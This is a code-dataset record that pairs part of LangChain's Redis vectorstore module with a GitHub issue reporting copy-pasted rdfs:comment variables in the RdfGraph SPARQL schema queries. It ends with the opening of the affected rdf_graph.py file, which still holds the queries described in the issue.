texts: List[str],
embedding: Embeddings,
metadatas: Optional[List[dict]] = None,
index_name: Optional[str] = None,
index_schema: Optional[Union[Dict[str, str], str, os.PathLike]] = None,
vector_schema: Optional[Dict[str, Union[str, int]]] = None,
**kwargs: Any,
) -> Redis:
"""Create a Redis vectorstore from a list of texts.
This is a user-friendly interface that:
1. Embeds documents.
2. Creates a new Redis index if it doesn't already exist
3. Adds the documents to the newly created Redis index.
This method will generate schema based on the metadata passed in
if the `index_schema` is not defined. If the `index_schema` is defined,
it will compare against the generated schema and warn if there are
differences. If you are purposefully defining the schema for the
metadata, then you can ignore that warning.
To examine the schema options, initialize an instance of this class
and print out the schema using the `Redis.schema`` property. This
will include the content and content_vector classes which are
always present in the langchain schema.
Example:
.. code-block:: python
from langchain.vectorstores import Redis
from langchain.embeddings import OpenAIEmbeddings
embeddings = OpenAIEmbeddings()
redisearch = RediSearch.from_texts(
texts,
embeddings,
redis_url="redis://username:password@localhost:6379"
)
Args:
texts (List[str]): List of texts to add to the vectorstore.
embedding (Embeddings): Embedding model class (i.e. OpenAIEmbeddings)
for embedding queries.
metadatas (Optional[List[dict]], optional): Optional list of metadata dicts
to add to the vectorstore. Defaults to None.
index_name (Optional[str], optional): Optional name of the index to create
or add to. Defaults to None.
index_schema (Optional[Union[Dict[str, str], str, os.PathLike]], optional):
Optional fields to index within the metadata. Overrides generated
schema. Defaults to None.
vector_schema (Optional[Dict[str, Union[str, int]]], optional): Optional
vector schema to use. Defaults to None.
**kwargs (Any): Additional keyword arguments to pass to the Redis client.
Returns:
Redis: Redis VectorStore instance.
Raises:
ValueError: If the number of metadatas does not match the number of texts.
ImportError: If the redis python package is not installed.
"""
instance, _ = cls.from_texts_return_keys(
texts,
embedding,
metadatas=metadatas,
index_name=index_name,
index_schema=index_schema,
vector_schema=vector_schema,
**kwargs,
)
return instance
@classmethod
def from_existing_index(
cls,
embedding: Embeddings,
index_name: str,
schema: Union[Dict[str, str], str, os.PathLike],
**kwargs: Any,
) -> Redis:
"""Connect to an existing Redis index.
Example:
.. code-block:: python
from langchain.vectorstores import Redis
from langchain.embeddings import OpenAIEmbeddings
embeddings = OpenAIEmbeddings()
redisearch = Redis.from_existing_index(
embeddings,
index_name="my-index",
redis_url="redis://username:password@localhost:6379"
)
Args:
embedding (Embeddings): Embedding model class (i.e. OpenAIEmbeddings)
for embedding queries.
index_name (str): Name of the index to connect to.
schema (Union[Dict[str, str], str, os.PathLike]): Schema of the index
and the vector schema. Can be a dict, or path to yaml file
**kwargs (Any): Additional keyword arguments to pass to the Redis client.
Returns:
Redis: Redis VectorStore instance.
Raises:
ValueError: If the index does not exist.
ImportError: If the redis python package is not installed.
"""
redis_url = get_from_dict_or_env(kwargs, "redis_url", "REDIS_URL")
try:
# We need to first remove redis_url from kwargs,
# otherwise passing it to Redis will result in an error.
if "redis_url" in kwargs:
kwargs.pop("redis_url")
client = get_client(redis_url=redis_url, **kwargs)
# check if redis has redisearch module installed
check_redis_module_exist(client, REDIS_REQUIRED_MODULES)
# ensure that the index already exists
assert check_index_exists(
client, index_name
), f"Index {index_name} does not exist"
except Exception as e:
raise ValueError(f"Redis failed to connect: {e}")
return cls(
redis_url,
index_name,
embedding,
index_schema=schema,
**kwargs,
)
@property
def schema(self) -> Dict[str, List[Any]]:
"""Return the schema of the index."""
return self._schema.as_dict()
def write_schema(self, path: Union[str, os.PathLike]) -> None:
"""Write the schema to a yaml file."""
with open(path, "w+") as f:
yaml.dump(self.schema, f)
@staticmethod
def delete(
ids: Optional[List[str]] = None,
**kwargs: Any,
) -> bool:
"""
Delete a Redis entry.
Args:
ids: List of ids (keys in redis) to delete.
redis_url: Redis connection url. This should be passed in the kwargs
or set as an environment variable: REDIS_URL.
Returns:
bool: Whether or not the deletions were successful.
Raises:
ValueError: If the redis python package is not installed.
ValueError: If the ids (keys in redis) are not provided
"""
redis_url = get_from_dict_or_env(kwargs, "redis_url", "REDIS_URL")
if ids is None:
raise ValueError("'ids' (keys)() were not provided.")
try:
import redis # noqa: F401
except ImportError:
raise ValueError(
"Could not import redis python package. "
"Please install it with `pip install redis`."
)
try:
# We need to first remove redis_url from kwargs,
# otherwise passing it to Redis will result in an error.
if "redis_url" in kwargs:
kwargs.pop("redis_url")
client = get_client(redis_url=redis_url, **kwargs)
except ValueError as e:
raise ValueError(f"Your redis connected error: {e}")
# Check if index exists
try:
client.delete(*ids)
logger.info("Entries deleted")
return True
except: # noqa: E722
# ids does not exist
return False
@staticmethod
def drop_index(
index_name: str,
delete_documents: bool,
**kwargs: Any,
) -> bool:
"""
Drop a Redis search index.
Args:
index_name (str): Name of the index to drop.
delete_documents (bool): Whether to drop the associated documents.
Returns:
bool: Whether or not the drop was successful.
"""
redis_url = get_from_dict_or_env(kwargs, "redis_url", "REDIS_URL")
try:
import redis # noqa: F401
except ImportError:
raise ValueError(
"Could not import redis python package. "
"Please install it with `pip install redis`."
)
try:
# We need to first remove redis_url from kwargs,
# otherwise passing it to Redis will result in an error.
if "redis_url" in kwargs:
kwargs.pop("redis_url")
client = get_client(redis_url=redis_url, **kwargs)
except ValueError as e:
raise ValueError(f"Your redis connected error: {e}")
# Check if index exists
try:
client.ft(index_name).dropindex(delete_documents)
logger.info("Drop index")
return True
except: # noqa: E722
# Index not exist
return False
def add_texts(
self,
texts: Iterable[str],
metadatas: Optional[List[dict]] = None,
embeddings: Optional[List[List[float]]] = None,
batch_size: int = 1000,
clean_metadata: bool = True,
**kwargs: Any,
) -> List[str]:
"""Add more texts to the vectorstore.
Args:
texts (Iterable[str]): Iterable of strings/text to add to the vectorstore.
metadatas (Optional[List[dict]], optional): Optional list of metadatas.
Defaults to None.
embeddings (Optional[List[List[float]]], optional): Optional pre-generated
embeddings. Defaults to None.
keys (List[str]) or ids (List[str]): Identifiers of entries.
Defaults to None.
batch_size (int, optional): Batch size to use for writes. Defaults to 1000.
Returns:
List[str]: List of ids added to the vectorstore
"""
ids = []
prefix = _redis_prefix(self.index_name)
# Get keys or ids from kwargs
# Other vectorstores use ids
keys_or_ids = kwargs.get("keys", kwargs.get("ids"))
# type check for metadata
if metadatas:
if isinstance(metadatas, list) and len(metadatas) != len(texts): # type: ignore # noqa: E501
raise ValueError("Number of metadatas must match number of texts")
if not (isinstance(metadatas, list) and isinstance(metadatas[0], dict)):
raise ValueError("Metadatas must be a list of dicts")
# Write data to redis
pipeline = self.client.pipeline(transaction=False)
for i, text in enumerate(texts):
# Use provided values by default or fallback
key = keys_or_ids[i] if keys_or_ids else _redis_key(prefix)
metadata = metadatas[i] if metadatas else {}
metadata = _prepare_metadata(metadata) if clean_metadata else metadata
embedding = (
embeddings[i] if embeddings else self._embeddings.embed_query(text)
)
pipeline.hset(
key,
mapping={
self._schema.content_key: text,
self._schema.content_vector_key: _array_to_buffer(
embedding, self._schema.vector_dtype
),
**metadata,
},
)
ids.append(key)
# Write batch
if i % batch_size == 0:
pipeline.execute()
# Cleanup final batch
pipeline.execute()
return ids
def as_retriever(self, **kwargs: Any) -> RedisVectorStoreRetriever:
tags = kwargs.pop("tags", None) or []
tags.extend(self._get_retriever_tags())
return RedisVectorStoreRetriever(vectorstore=self, **kwargs, tags=tags)
@deprecated("0.0.272", alternative="similarity_search(distance_threshold=0.1)")
def similarity_search_limit_score(
self, query: str, k: int = 4, score_threshold: float = 0.2, **kwargs: Any
) -> List[Document]:
"""
Returns the most similar indexed documents to the query text within the
score_threshold range.
Deprecated: Use similarity_search with distance_threshold instead.
Args:
query (str): The query text for which to find similar documents.
k (int): The number of documents to return. Default is 4.
score_threshold (float): The minimum matching *distance* required
for a document to be considered a match. Defaults to 0.2.
Returns:
List[Document]: A list of documents that are most similar to the query text
including the match score for each document.
Note:
If there are no documents that satisfy the score_threshold value,
an empty list is returned.
"""
return self.similarity_search(
query, k=k, distance_threshold=score_threshold, **kwargs
)
def similarity_search_with_score(
self,
query: str,
k: int = 4,
filter: Optional[RedisFilterExpression] = None,
return_metadata: bool = True,
**kwargs: Any,
) -> List[Tuple[Document, float]]:
"""Run similarity search with **vector distance**.
The "scores" returned from this function are the raw vector
distances from the query vector. For similarity scores, use
``similarity_search_with_relevance_scores``.
Args:
query (str): The query text for which to find similar documents.
k (int): The number of documents to return. Default is 4.
filter (RedisFilterExpression, optional): Optional metadata filter.
Defaults to None.
return_metadata (bool, optional): Whether to return metadata.
Defaults to True.
Returns:
List[Tuple[Document, float]]: A list of documents that are
most similar to the query with the distance for each document.
"""
try:
import redis
except ImportError as e:
raise ImportError(
"Could not import redis python package. "
"Please install it with `pip install redis`."
) from e
if "score_threshold" in kwargs:
logger.warning(
"score_threshold is deprecated. Use distance_threshold instead."
+ "score_threshold should only be used in "
+ "similarity_search_with_relevance_scores."
+ "score_threshold will be removed in a future release.",
)
query_embedding = self._embeddings.embed_query(query)
redis_query, params_dict = self._prepare_query(
query_embedding,
k=k,
filter=filter,
with_metadata=return_metadata,
with_distance=True,
**kwargs,
)
# Perform vector search
# ignore type because redis-py is wrong about bytes
try:
results = self.client.ft(self.index_name).search(redis_query, params_dict) # type: ignore # noqa: E501
except redis.exceptions.ResponseError as e:
# split error message and see if it starts with "Syntax"
if str(e).split(" ")[0] == "Syntax":
raise ValueError(
"Query failed with syntax error. "
+ "This is likely due to malformation of "
+ "filter, vector, or query argument"
) from e
raise e
# Prepare document results
docs_with_scores: List[Tuple[Document, float]] = []
for result in results.docs:
metadata = {}
if return_metadata:
metadata = {"id": result.id}
metadata.update(self._collect_metadata(result))
doc = Document(page_content=result.content, metadata=metadata)
distance = self._calculate_fp_distance(result.distance)
docs_with_scores.append((doc, distance))
return docs_with_scores
def similarity_search(
self,
query: str,
k: int = 4,
filter: Optional[RedisFilterExpression] = None,
return_metadata: bool = True,
distance_threshold: Optional[float] = None,
**kwargs: Any,
) -> List[Document]:
"""Run similarity search
Args:
query (str): The query text for which to find similar documents.
k (int): The number of documents to return. Default is 4.
filter (RedisFilterExpression, optional): Optional metadata filter.
Defaults to None.
return_metadata (bool, optional): Whether to return metadata.
Defaults to True.
distance_threshold (Optional[float], optional): Maximum vector distance
between selected documents and the query vector. Defaults to None.
Returns:
List[Document]: A list of documents that are most similar to the query
text.
"""
query_embedding = self._embeddings.embed_query(query)
return self.similarity_search_by_vector(
query_embedding,
k=k,
filter=filter,
return_metadata=return_metadata,
distance_threshold=distance_threshold,
**kwargs,
)
def similarity_search_by_vector(
self,
embedding: List[float],
k: int = 4,
filter: Optional[RedisFilterExpression] = None,
return_metadata: bool = True,
distance_threshold: Optional[float] = None,
**kwargs: Any,
) -> List[Document]:
"""Run similarity search between a query vector and the indexed vectors.
Args:
embedding (List[float]): The query vector for which to find similar
documents.
k (int): The number of documents to return. Default is 4.
filter (RedisFilterExpression, optional): Optional metadata filter.
Defaults to None.
return_metadata (bool, optional): Whether to return metadata.
Defaults to True.
distance_threshold (Optional[float], optional): Maximum vector distance
between selected documents and the query vector. Defaults to None.
Returns:
List[Document]: A list of documents that are most similar to the query
text.
"""
try:
import redis
except ImportError as e:
raise ImportError(
"Could not import redis python package. "
"Please install it with `pip install redis`."
) from e
if "score_threshold" in kwargs:
logger.warning(
"score_threshold is deprecated. Use distance_threshold instead."
+ "score_threshold should only be used in "
+ "similarity_search_with_relevance_scores."
+ "score_threshold will be removed in a future release.",
)
redis_query, params_dict = self._prepare_query(
embedding,
k=k,
filter=filter,
distance_threshold=distance_threshold,
with_metadata=return_metadata,
with_distance=False,
)
# Perform vector search
# ignore type because redis-py is wrong about bytes
try:
results = self.client.ft(self.index_name).search(redis_query, params_dict) # type: ignore # noqa: E501
except redis.exceptions.ResponseError as e:
# split error message and see if it starts with "Syntax"
if str(e).split(" ")[0] == "Syntax":
raise ValueError(
"Query failed with syntax error. "
+ "This is likely due to malformation of "
+ "filter, vector, or query argument"
) from e
raise e
# Prepare document results
docs = []
for result in results.docs:
metadata = {}
if return_metadata:
metadata = {"id": result.id}
metadata.update(self._collect_metadata(result))
content_key = self._schema.content_key
docs.append(
Document(page_content=getattr(result, content_key), metadata=metadata)
)
return docs
def max_marginal_relevance_search(
self,
query: str,
k: int = 4,
fetch_k: int = 20,
lambda_mult: float = 0.5,
filter: Optional[RedisFilterExpression] = None,
return_metadata: bool = True,
distance_threshold: Optional[float] = None,
**kwargs: Any,
) -> List[Document]:
"""Return docs selected using the maximal marginal relevance.
Maximal marginal relevance optimizes for similarity to query AND diversity
among selected documents.
Args:
query (str): Text to look up documents similar to.
k (int): Number of Documents to return. Defaults to 4.
fetch_k (int): Number of Documents to fetch to pass to MMR algorithm.
lambda_mult (float): Number between 0 and 1 that determines the degree
of diversity among the results with 0 corresponding
to maximum diversity and 1 to minimum diversity.
Defaults to 0.5.
filter (RedisFilterExpression, optional): Optional metadata filter.
Defaults to None.
return_metadata (bool, optional): Whether to return metadata.
Defaults to True.
distance_threshold (Optional[float], optional): Maximum vector distance
between selected documents and the query vector. Defaults to None.
Returns:
List[Document]: A list of Documents selected by maximal marginal relevance.
"""
# Embed the query
query_embedding = self._embeddings.embed_query(query)
# Fetch the initial documents
prefetch_docs = self.similarity_search_by_vector(
query_embedding,
k=fetch_k,
filter=filter,
return_metadata=return_metadata,
distance_threshold=distance_threshold,
**kwargs,
)
prefetch_ids = [doc.metadata["id"] for doc in prefetch_docs]
# Get the embeddings for the fetched documents
prefetch_embeddings = [
_buffer_to_array(
cast(
bytes,
self.client.hget(prefetch_id, self._schema.content_vector_key),
),
dtype=self._schema.vector_dtype,
)
for prefetch_id in prefetch_ids
]
# Select documents using maximal marginal relevance
selected_indices = maximal_marginal_relevance(
np.array(query_embedding), prefetch_embeddings, lambda_mult=lambda_mult, k=k
)
selected_docs = [prefetch_docs[i] for i in selected_indices]
return selected_docs
def _collect_metadata(self, result: "Document") -> Dict[str, Any]:
"""Collect metadata from Redis.
Method ensures that there isn't a mismatch between the metadata
and the index schema passed to this class by the user or generated
by this class.
Args:
result (Document): redis.commands.search.Document object returned
from Redis.
Returns:
Dict[str, Any]: Collected metadata.
"""
# new metadata dict as modified by this method
meta = {}
for key in self._schema.metadata_keys:
try:
meta[key] = getattr(result, key)
except AttributeError:
# warning about attribute missing
logger.warning(
f"Metadata key {key} not found in metadata. "
+ "Setting to None. \n"
+ "Metadata fields defined for this instance: "
+ f"{self._schema.metadata_keys}"
)
meta[key] = None
return meta
def _prepare_query(
self,
query_embedding: List[float],
k: int = 4,
filter: Optional[RedisFilterExpression] = None,
distance_threshold: Optional[float] = None,
with_metadata: bool = True,
with_distance: bool = False,
) -> Tuple["Query", Dict[str, Any]]:
# Creates Redis query
params_dict: Dict[str, Union[str, bytes, float]] = {
"vector": _array_to_buffer(query_embedding, self._schema.vector_dtype),
}
# prepare return fields including score
return_fields = [self._schema.content_key]
if with_distance:
return_fields.append("distance")
if with_metadata:
return_fields.extend(self._schema.metadata_keys)
if distance_threshold:
params_dict["distance_threshold"] = distance_threshold
return (
self._prepare_range_query(
k, filter=filter, return_fields=return_fields
),
params_dict,
)
return (
self._prepare_vector_query(k, filter=filter, return_fields=return_fields),
params_dict,
)
def _prepare_range_query(
self,
k: int,
filter: Optional[RedisFilterExpression] = None,
return_fields: Optional[List[str]] = None,
) -> "Query":
try:
from redis.commands.search.query import Query
except ImportError as e:
raise ImportError(
"Could not import redis python package. "
"Please install it with `pip install redis`."
) from e
return_fields = return_fields or []
vector_key = self._schema.content_vector_key
base_query = f"@{vector_key}:[VECTOR_RANGE $distance_threshold $vector]"
if filter:
base_query = "(" + base_query + " " + str(filter) + ")"
query_string = base_query + "=>{$yield_distance_as: distance}"
return (
Query(query_string)
.return_fields(*return_fields)
.sort_by("distance")
.paging(0, k)
.dialect(2)
)
def _prepare_vector_query(
self,
k: int,
filter: Optional[RedisFilterExpression] = None,
return_fields: Optional[List[str]] = None,
) -> "Query":
"""Prepare query for vector search.
Args:
k: Number of results to return.
filter: Optional metadata filter.
Returns:
query: Query object.
"""
try:
from redis.commands.search.query import Query
except ImportError as e:
raise ImportError(
"Could not import redis python package. "
"Please install it with `pip install redis`."
) from e
return_fields = return_fields or []
query_prefix = "*"
if filter:
query_prefix = f"{str(filter)}"
vector_key = self._schema.content_vector_key
base_query = f"({query_prefix})=>[KNN {k} @{vector_key} $vector AS distance]"
query = (
Query(base_query)
.return_fields(*return_fields)
.sort_by("distance")
.paging(0, k)
.dialect(2)
)
return query
def _get_schema_with_defaults(
self,
index_schema: Optional[Union[Dict[str, str], str, os.PathLike]] = None,
vector_schema: Optional[Dict[str, Union[str, int]]] = None,
) -> "RedisModel":
# should only be called after init of Redis (so Import handled)
from langchain.vectorstores.redis.schema import RedisModel, read_schema
schema = RedisModel()
# read in schema (yaml file or dict) and
# pass to the Pydantic validators
if index_schema:
schema_values = read_schema(index_schema)
schema = RedisModel(**schema_values)
# ensure user did not exclude the content field
# no modifications if content field found
schema.add_content_field()
# if no content_vector field, add vector field to schema
# this makes adding a vector field to the schema optional when
# the user just wants additional metadata
try:
# see if user overrode the content vector
schema.content_vector
# if user overrode the content vector, check if they
# also passed vector schema. This won't be used since
# the index schema overrode the content vector
if vector_schema:
logger.warning(
"`vector_schema` is ignored since content_vector is "
+ "overridden in `index_schema`."
)
# user did not override content vector
except ValueError:
# set default vector schema and update with user provided schema
# if the user provided any
vector_field = self.DEFAULT_VECTOR_SCHEMA.copy()
if vector_schema:
vector_field.update(vector_schema)
# add the vector field either way
schema.add_vector_field(vector_field)
return schema
def _create_index(self, dim: int = 1536) -> None:
try:
from redis.commands.search.indexDefinition import ( # type: ignore
IndexDefinition,
IndexType,
)
except ImportError:
raise ImportError(
"Could not import redis python package. "
"Please install it with `pip install redis`."
)
# Set vector dimension
# can't obtain beforehand because we don't
# know which embedding model is being used.
self._schema.content_vector.dims = dim
# Check if index exists
if not check_index_exists(self.client, self.index_name):
prefix = _redis_prefix(self.index_name)
# Create Redis Index
self.client.ft(self.index_name).create_index(
fields=self._schema.get_fields(),
definition=IndexDefinition(prefix=[prefix], index_type=IndexType.HASH),
)
def _calculate_fp_distance(self, distance: str) -> float:
"""Calculate the distance based on the vector datatype
Two datatypes supported:
- FLOAT32
- FLOAT64
if it's FLOAT32, we need to round the distance to 4 decimal places
otherwise, round to 7 decimal places.
"""
if self._schema.content_vector.datatype == "FLOAT32":
return round(float(distance), 4)
return round(float(distance), 7)
def _check_deprecated_kwargs(self, kwargs: Mapping[str, Any]) -> None:
"""Check for deprecated kwargs."""
deprecated_kwargs = {
"redis_host": "redis_url",
"redis_port": "redis_url",
"redis_password": "redis_url",
"content_key": "index_schema",
"vector_key": "vector_schema",
"distance_metric": "vector_schema",
}
for key, value in kwargs.items():
if key in deprecated_kwargs:
raise ValueError(
f"Keyword argument '{key}' is deprecated. "
f"Please use '{deprecated_kwargs[key]}' instead."
)
def _select_relevance_score_fn(self) -> Callable[[float], float]:
if self.relevance_score_fn:
return self.relevance_score_fn
metric_map = {
"COSINE": self._cosine_relevance_score_fn,
"IP": self._max_inner_product_relevance_score_fn,
"L2": self._euclidean_relevance_score_fn,
}
try:
return metric_map[self._schema.content_vector.distance_metric]
except KeyError:
return _default_relevance_score
def _generate_field_schema(data: Dict[str, Any]) -> Dict[str, Any]:
"""
Generate a schema for the search index in Redis based on the input metadata.
Given a dictionary of metadata, this function categorizes each metadata
field into one of the three categories:
- text: The field contains textual data.
- numeric: The field contains numeric data (either integer or float).
- tag: The field contains list of tags (strings).
Args
data (Dict[str, Any]): A dictionary where keys are metadata field names
and values are the metadata values.
Returns:
Dict[str, Any]: A dictionary with three keys "text", "numeric", and "tag".
Each key maps to a list of fields that belong to that category.
Raises:
ValueError: If a metadata field cannot be categorized into any of
the three known types.
"""
result: Dict[str, Any] = {
"text": [],
"numeric": [],
"tag": [],
}
for key, value in data.items():
# Numeric fields
try:
int(value)
result["numeric"].append({"name": key})
continue
except (ValueError, TypeError):
pass
# None values are not indexed as of now
if value is None:
continue
# if it's a list of strings, we assume it's a tag
if isinstance(value, (list, tuple)):
if not value or isinstance(value[0], str):
result["tag"].append({"name": key})
else:
name = type(value[0]).__name__
raise ValueError(
f"List/tuple values should contain strings: '{key}': {name}"
)
continue
# Check if value is string before processing further
if isinstance(value, str):
result["text"].append({"name": key})
continue
# Unable to classify the field value
name = type(value).__name__
raise ValueError(
"Could not generate Redis index field type mapping "
+ f"for metadata: '{key}': {name}"
)
return result
def _prepare_metadata(metadata: Dict[str, Any]) -> Dict[str, Any]:
"""
Prepare metadata for indexing in Redis by sanitizing its values.
- String, integer, and float values remain unchanged.
- None or empty values are replaced with empty strings.
- Lists/tuples of strings are joined into a single string with a comma separator.
Args:
metadata (Dict[str, Any]): A dictionary where keys are metadata
field names and values are the metadata values.
Returns:
Dict[str, Any]: A sanitized dictionary ready for indexing in Redis.
Raises:
ValueError: If any metadata value is not one of the known
types (string, int, float, or list of strings).
"""
def raise_error(key: str, value: Any) -> None:
raise ValueError(
f"Metadata value for key '{key}' must be a string, int, "
+ f"float, or list of strings. Got {type(value).__name__}"
)
clean_meta: Dict[str, Union[str, float, int]] = {}
for key, value in metadata.items():
if not value:
clean_meta[key] = ""
continue
# No transformation needed
if isinstance(value, (str, int, float)):
clean_meta[key] = value
# if it's a list/tuple of strings, we join it
elif isinstance(value, (list, tuple)):
if not value or isinstance(value[0], str):
clean_meta[key] = REDIS_TAG_SEPARATOR.join(value)
else:
raise_error(key, value)
else:
raise_error(key, value)
return clean_meta
class RedisVectorStoreRetriever(VectorStoreRetriever):
"""Retriever for Redis VectorStore."""
vectorstore: Redis
"""Redis VectorStore."""
search_type: str = "similarity"
"""Type of search to perform. Can be either
'similarity',
'similarity_distance_threshold',
'similarity_score_threshold'
"""
search_kwargs: Dict[str, Any] = {
"k": 4,
"score_threshold": 0.9,
# set to None to avoid distance used in score_threshold search
"distance_threshold": None,
}
"""Default search kwargs."""
allowed_search_types = [
"similarity",
"similarity_distance_threshold",
"similarity_score_threshold",
"mmr",
]
"""Allowed search types."""
class Config:
"""Configuration for this pydantic object."""
arbitrary_types_allowed = True
def _get_relevant_documents(
self, query: str, *, run_manager: CallbackManagerForRetrieverRun
) -> List[Document]:
if self.search_type == "similarity":
docs = self.vectorstore.similarity_search(query, **self.search_kwargs)
elif self.search_type == "similarity_distance_threshold":
if self.search_kwargs["distance_threshold"] is None:
raise ValueError(
"distance_threshold must be provided for "
+ "similarity_distance_threshold retriever"
)
docs = self.vectorstore.similarity_search(query, **self.search_kwargs)
elif self.search_type == "similarity_score_threshold":
docs_and_similarities = (
self.vectorstore.similarity_search_with_relevance_scores(
query, **self.search_kwargs
)
)
docs = [doc for doc, _ in docs_and_similarities]
elif self.search_type == "mmr":
docs = self.vectorstore.max_marginal_relevance_search(
query, **self.search_kwargs
)
else:
raise ValueError(f"search_type of {self.search_type} not allowed.")
return docs
async def _aget_relevant_documents(
self, query: str, *, run_manager: AsyncCallbackManagerForRetrieverRun
) -> List[Document]:
raise NotImplementedError("RedisVectorStoreRetriever does not support async")
def add_documents(self, documents: List[Document], **kwargs: Any) -> List[str]:
"""Add documents to vectorstore."""
return self.vectorstore.add_documents(documents, **kwargs)
async def aadd_documents(
self, documents: List[Document], **kwargs: Any
) -> List[str]:
"""Add documents to vectorstore."""
return await self.vectorstore.aadd_documents(documents, **kwargs)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,907 | RdfGraph schema retrieval queries for the relation types are not linked by the correct comment variable | ### System Info
langchain = 0.0.251
Python = 3.10.11
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1. Create an OWL ontology called `dbpedia_sample.ttl` with the following:
``` turtle
@prefix rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#> .
@prefix dcterms: <http://purl.org/dc/terms/> .
@prefix wikidata: <http://www.wikidata.org/entity/> .
@prefix owl: <http://www.w3.org/2002/07/owl#> .
@prefix rdfs: <http://www.w3.org/2000/01/rdf-schema#> .
@prefix prov: <http://www.w3.org/ns/prov#> .
@prefix : <http://dbpedia.org/ontology/> .
:Actor
a owl:Class ;
rdfs:comment "An actor or actress is a person who acts in a dramatic production and who works in film, television, theatre, or radio in that capacity."@en ;
rdfs:label "actor"@en ;
rdfs:subClassOf :Artist ;
owl:equivalentClass wikidata:Q33999 ;
prov:wasDerivedFrom <http://mappings.dbpedia.org/index.php/OntologyClass:Actor> .
:AdministrativeRegion
a owl:Class ;
rdfs:comment "A PopulatedPlace under the jurisdiction of an administrative body. This body may administer either a whole region or one or more adjacent Settlements (town administration)"@en ;
rdfs:label "administrative region"@en ;
rdfs:subClassOf :Region ;
owl:equivalentClass <http://schema.org/AdministrativeArea>, wikidata:Q3455524 ;
prov:wasDerivedFrom <http://mappings.dbpedia.org/index.php/OntologyClass:AdministrativeRegion> .
:birthPlace
a rdf:Property, owl:ObjectProperty ;
rdfs:comment "where the person was born"@en ;
rdfs:domain :Animal ;
rdfs:label "birth place"@en ;
rdfs:range :Place ;
rdfs:subPropertyOf dul:hasLocation ;
owl:equivalentProperty <http://schema.org/birthPlace>, wikidata:P19 ;
prov:wasDerivedFrom <http://mappings.dbpedia.org/index.php/OntologyProperty:birthPlace> .
```
2. Run
``` python
from langchain.graphs import RdfGraph
graph = RdfGraph(
source_file="dbpedia_sample.ttl",
serialization="ttl",
standard="owl"
)
print(graph.get_schema)
```
3. Output
```
In the following, each IRI is followed by the local name and optionally its description in parentheses.
The OWL graph supports the following node types:
<http://dbpedia.org/ontology/Actor> (Actor, An actor or actress is a person who acts in a dramatic production and who works in film, television, theatre, or radio in that capacity.),
<http://dbpedia.org/ontology/AdministrativeRegion> (AdministrativeRegion, A PopulatedPlace under the jurisdiction of an administrative body. This body may administer either a whole region or one or more adjacent Settlements (town administration))
The OWL graph supports the following object properties, i.e., relationships between objects:
<http://dbpedia.org/ontology/birthPlace> (birthPlace, An actor or actress is a person who acts in a dramatic production and who works in film, television, theatre, or radio in that capacity.),
<http://dbpedia.org/ontology/birthPlace> (birthPlace, A PopulatedPlace under the jurisdiction of an administrative body. This body may administer either a whole region or one or more adjacent Settlements (town administration)), <http://dbpedia.org/ontology/birthPlace> (birthPlace, where the person was born)
The OWL graph supports the following data properties, i.e., relationships between objects and literals:
```
### Expected behavior
The issue is that in the SPARQL queries getting the properties the `rdfs:comment` triple pattern always refers to the variable `?cls` which obviously comes from copy/paste code.
For example, getting the RDFS properties via
``` python
rel_query_rdf = prefixes["rdfs"] + (
"""SELECT DISTINCT ?rel ?com\n"""
"""WHERE { \n"""
""" ?subj ?rel ?obj . \n"""
""" OPTIONAL { ?cls rdfs:comment ?com } \n"""
"""}"""
)
```
you can see that the `OPTIONAL` clause refers to `?cls`, but it should be `?rel`.
The same holds for all other queries regarding properties.
The current status leads to a cartesian product of properties and all `rdfs:comment` vlaues in the dataset, which can be horribly large and of course leads to misleading and huge prompts (see the output of my sample in the "reproduction" part) | https://github.com/langchain-ai/langchain/issues/8907 | https://github.com/langchain-ai/langchain/pull/9136 | d9f1bcf366b5a66021d246d8e9c56e76fe60ead1 | cce132d1460b4f52541cb4a6f13219fb8fe4f907 | "2023-08-08T10:57:54Z" | python | "2023-10-25T20:36:57Z" | libs/langchain/langchain/graphs/rdf_graph.py | from __future__ import annotations
from typing import (
TYPE_CHECKING,
List,
Optional,
)
if TYPE_CHECKING:
import rdflib
prefixes = {
"owl": """PREFIX owl: <http://www.w3.org/2002/07/owl#>\n""",
"rdf": """PREFIX rdf: <http://www.w3.org/1999/02/22-rdf-syntax-ns#>\n""",
"rdfs": """PREFIX rdfs: <http://www.w3.org/2000/01/rdf-schema#>\n""",
"xsd": """PREFIX xsd: <http://www.w3.org/2001/XMLSchema#>\n""",
}
cls_query_rdf = prefixes["rdfs"] + (
"""SELECT DISTINCT ?cls ?com\n"""
"""WHERE { \n"""
""" ?instance a ?cls . \n"""
""" OPTIONAL { ?cls rdfs:comment ?com } \n"""
"""}"""
)
cls_query_rdfs = prefixes["rdfs"] + (
"""SELECT DISTINCT ?cls ?com\n"""
"""WHERE { \n"""
""" ?instance a/rdfs:subClassOf* ?cls . \n"""
""" OPTIONAL { ?cls rdfs:comment ?com } \n"""
"""}"""
)
cls_query_owl = prefixes["rdfs"] + (
"""SELECT DISTINCT ?cls ?com\n"""
"""WHERE { \n"""
""" ?instance a/rdfs:subClassOf* ?cls . \n"""
""" FILTER (isIRI(?cls)) . \n"""
""" OPTIONAL { ?cls rdfs:comment ?com } \n"""
"""}"""
)
rel_query_rdf = prefixes["rdfs"] + (
"""SELECT DISTINCT ?rel ?com\n"""
"""WHERE { \n"""
""" ?subj ?rel ?obj . \n"""
""" OPTIONAL { ?cls rdfs:comment ?com } \n"""
"""}"""
)
rel_query_rdfs = (
prefixes["rdf"]
+ prefixes["rdfs"]
+ (
"""SELECT DISTINCT ?rel ?com\n"""
"""WHERE { \n"""
""" ?rel a/rdfs:subPropertyOf* rdf:Property . \n"""
""" OPTIONAL { ?cls rdfs:comment ?com } \n"""
"""}"""
)
)
op_query_owl = (
prefixes["rdfs"]
+ prefixes["owl"]
+ (
"""SELECT DISTINCT ?op ?com\n"""
"""WHERE { \n"""
""" ?op a/rdfs:subPropertyOf* owl:ObjectProperty . \n"""
""" OPTIONAL { ?cls rdfs:comment ?com } \n"""
"""}"""
)
)
dp_query_owl = (
prefixes["rdfs"]
+ prefixes["owl"]
+ (
